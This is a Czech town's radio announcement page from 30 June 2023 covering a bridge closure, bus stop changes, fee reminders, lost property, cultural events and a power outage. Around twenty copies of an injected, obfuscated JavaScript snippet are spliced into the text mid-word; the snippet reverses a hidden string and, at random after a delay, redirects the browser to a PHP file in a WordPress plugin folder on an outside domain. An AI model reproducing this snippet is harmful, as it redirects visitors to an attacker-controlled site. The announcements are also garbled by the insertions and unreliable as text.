Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 30. června 2023

Pátek, 30. června 2023

Z ÚŘADU:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou informuje o uzavření mostu na Strojírenské ulici. Od pondělí 3. července 2023 nebude most průjezdný pro mo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torovou dopravu. Chodci projdou po celou dobu stavby. Ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovo by mělo být na konci lis$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. Více informací najdete na webu SAARPLAN nebo na Facebooku města.

Městský úřad odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou části ulice Strojírenská dochází od pondělí 3. července 2023 do 31. října 2023 ke zrušení zastávky MHD Strojírenská u mostu pro všechny linky. Náhradní zastávka jsou Dagmarky. 

Dále oznamujeme, že v souvislosti s úplnou uzavírkou ulice Studentská dochází od pondělí 10. července 2023 do neděle 16. července 2023 ke zrušení zastávky MHD Studentská bez náhrady pro všechny linky. 

Cestující mohou využívat nejbližších nebo náhradních zastávek na trasách jednotlivých dotčených linek tak$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:

- linka č. 1 – náhradní zastávka Wonkova

- linka č. 2 – náhradní zastávka Wonkova

- linka č. 3 – náhradní zastávka Wonkova

- linka č. 4 – nejbližší zastávky Neumannova, Libušínská

- linka č. 5 – náhradní zastávka Wonkova

- linka č. 6 – náhradní zastávka Wonkova

- linka č. 7 – náhradní zastávka Wonkova

- linka č. 8 – nejbližší zastávky Libušínská, Neumannova

- linkové spoje – náhradní zastávka Wonkova

Dále, ve stejném termínu, dojde ke zrušení zastávky MHD Wonkova pro linky č. 4 a 8. Nejbližší zastávky jsou Libušínská a Neumannova.

Děkujeme za pochopení

Dále odbor komunálních služeb oznamuje, že od 1. července 2023 dochází k rozšíření linky MHD č. 6. Tím$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to rozšířením se snažíme v rámci daných možností reagovat na zrušení poboček České počty ve Žďáře 2 a 3, abychom usnadnili spojení na zbývající pobočku na ulici Nádražní.

Posílení spojů umožní lepší spojení mezi některými částmi a středem města tak, jak $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to částečně bylo v před covidové době, současně je tím$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zajištěna lepší obslužnost hřbi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tova na Zelené hoře a dostupnost pohřebních služeb a správy pohřebišť.  

Nový jízdní řád je dostupný na webech města, dopravce a v celostátním informačním systému, dále je možné si ho pořídit na recepci městského úřadu.

Změny v jízdním řádu linky MHD č. 6 od 1. 7. 2023:

spoj 7 – uspíšení o 20 minut a jeho prodloužení na Zelenou horu pro spoj 10

spoj 10 – odjezd ze Zelené hory pro možnost vyřízení na poště Nádražní a zpět lze využít spoj 9 (cca 25 minut na poště)

spoj 1 – prodloužení na Zelenou horu (lze využít jako vratný spoj z pošty po příjezdu spojem 14 (cca 25 minut na poště)

spoj 2 – prodloužení ze Zelené hory, opoždění (lze využít poštu a zpět spojem 5 v 13:01, cca 45 minut pošta, pěší zóna)

nové spoje:

spoj 11 pro odvoz z pošty po pracovní době (možnost dojezdu spojem 4 v 15:16 a čas na poště, pěší zóně cca 55 minut) 

 

Městský úřad odbor majetkoprávní upozorňuje na okamži$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou úhradu za pronájem pozemků ve vlastnictví města pod řadovými Prefa garážemi a za zahrádky u by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových domů. Úhradu s uvedením variabilního symbolu a jména nájemce uhraďte nejpozději do 30. června 2023. Případné dotazy a informace poskytne p. Marie Dvořáková, tel. 566 688 171. 

Odbor komunálních služeb oznamuje, že poplatek za komunální odpad je již po splatnosti. Poplatek můžete uhradit bankovním převodem pod přiděleným variabilním symbolem, nebo na pokladně městského úřadu v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti, nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Bližší informace poskytne Bc. Sylva Pikulová na tel. čísle 566 688 187 nebo jsou k dispozici na webových stránkách města.

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou pořádá v rámci projektu Aktivně pro Žďár letní cvičení na Farčatech. Program nabízí tancování s Džamilou, cvičení se Zuzkou a jógu s Idou, Janou a Radkou. Nově je v nabídce i cvičení pro rodiče s dětmi od 2 let. Přesné termíny a další informace najdete na Facebooku a webu města.

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byl předán svazek klíčů a klíč + přívěšek. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

KULTURNÍ POZVÁNKY:

Věž kostela svatého Prokopa je veřejnosti otevřená do 30. září 2023 každý den mimo pondělí a deštivého počasí. Vstupné činí 40 a 20 korun. Více informací najdete na webu www.muzeumzdar.cz

Regionální muzeum zve na speciální prázdninové workshopy pro děti. Uskuteční se každé úterý a středu od 10.00 do 11.30 hodin. Tématy budou Kouzlo objevování a Výprava do středověku. Mís$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na workshopech je nutné si předem rezervovat na čísle 736 776 840. Více informací najdete na webu www.muzeumzdar.cz

Knihovna Matěje Josefa Sychry Vás zve na výstavu Velehory a lidé v nich. Expozice velkoformá$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových panoramatických fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jana Grubera z nepálských Himalájí a peruánských And je umístěna v Galerii u Sychry do konce srpna 2023.

Knihovna Matěje Josefa Sychry upozorňuje čtenáře na změnu půjčovní doby od 1. července do 3. září 2023. Více informací naleznete na webových stránkách www.knihzdar.cz.

V Regionálním muzeu na Tvrzi probíhá do 27. srpna 2023 výstava Kouzlo objevování: Od hieroglyfů k Tutanchamonovi. Návštěvníci se seznámí s životem starých Egypťanů, proniknou do tajů egyptských hieroglyfů a doslova se ocitnou v hrobce faraona Tutanchamona. Více informací najdete na webu www.muzeumzdar.cz nebo na Facebooku.

EG.D, a.s. oznamuje, že z důvodu plánovaných prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dne 5. července 2023 na ul. Jihlavská – odběratelská trafostanice Žďár T82 Hettich č. 201161. Přerušení bude probíhat od 7:00 do 18:00 hodin. 

KONEC HLÁŠENÍ